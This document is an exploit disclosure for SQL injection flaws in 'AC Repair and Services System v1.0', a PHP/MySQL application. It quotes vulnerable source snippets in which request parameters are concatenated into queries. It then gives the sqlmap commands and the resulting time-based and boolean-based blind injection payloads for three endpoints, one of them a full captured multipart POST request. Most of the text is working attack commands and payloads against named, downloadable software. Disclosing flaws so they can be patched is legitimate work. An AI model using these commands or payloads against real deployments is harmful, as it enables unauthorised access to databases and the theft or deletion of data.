# Exploit Title: AC Repair and Services System v1.0 - Multiple SQL Injection # Date: 27 December 2023 # Exploit Author: Gnanaraj Mauviel (@0xm3m) # Vendor: oretnom23 # Vendor Homepage: https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-acrss.zip # Version: v1.0 # Tested on: Mac OSX, XAMPP, Apache, MySQL ------------------------------------------------------------------------------------------------------------------------------------------- Source Code(/php-acrss/admin/user/manage_user.php): query("SELECT * FROM users where id ='{$_GET['id']}' "); foreach($user->fetch_array() as $k =>$v){ $meta[$k] = $v; } } ?> -> sqlmap -u "http://localhost/php-acrss/admin/?page=user/manage_user&id=" --batch --- Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=user/manage_user&id=' AND (SELECT 5500 FROM (SELECT(SLEEP(5)))hiCZ) AND 'rZIs'='rZIs --- Source Code(/php-acrss/classes/Master.php): function delete_inquiry(){ extract($_POST); $del = $this->conn->query("DELETE FROM `inquiry_list` where id = '{$id}'"); if($del){ $resp['status'] = 'success'; $this->settings->set_flashdata('success'," Inquiry successfully deleted."); }else{ $resp['status'] = 'failed'; $resp['error'] = $this->conn->error; } return json_encode($resp); } -> sqlmap -u "http://localhost/php-acrss/classes/Master.php?f=delete_inquiry" --data="id=*" --batch --- Parameter: #1* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=' AND (SELECT 7930 FROM (SELECT(SLEEP(5)))XwlG) AND 'Jimw'='Jimw --- Source Code(/php-acrss/classes/Users.php): $qry = $this->conn->query("UPDATE users set $data where id = {$id}"); if($qry){ $this->settings->set_flashdata('success','User Details successfully updated.'); foreach($_POST as $k => $v){ if($k != 'id'){ if(!empty($data)) $data .=" , "; if($this->settings->userdata('id') == $id) $this->settings->set_userdata($k,$v); } } POST /php-acrss/classes/Users.php?f=save HTTP/1.1 Host: localhost Content-Length: 943 sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120" Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAUtgvsSwiJifz27g X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36 sec-ch-ua-platform: "macOS" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/php-acrss/admin/?page=user/manage_user&id=9 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: PHPSESSID=o92n8nati3696kg69plidv5e77 Connection: close ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="id" 9 ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="firstname" Claire ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="middlename" ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="lastname" Blake ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="username" cblake ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="password" ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="type" 2 ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryAUtgvsSwiJifz27g-- -> sqlmap -r ~/Documents/POST-localhost.txt --batch --- Parameter: MULTIPART id ((custom) POST) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="id" (SELECT (CASE WHEN (3947=3947) THEN 9 ELSE (SELECT 2252 UNION SELECT 2638) END)) ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="firstname" Claire ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="middlename" ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="lastname" Blake ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="username" cblake ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="password" ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="type" 2 ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryAUtgvsSwiJifz27g-- Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="id" 9 AND (SELECT 7168 FROM (SELECT(SLEEP(5)))pifO) ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="firstname" Claire ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="middlename" ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="lastname" Blake ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="username" cblake ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="password" ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="type" 2 ------WebKitFormBoundaryAUtgvsSwiJifz27g Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryAUtgvsSwiJifz27g-- ---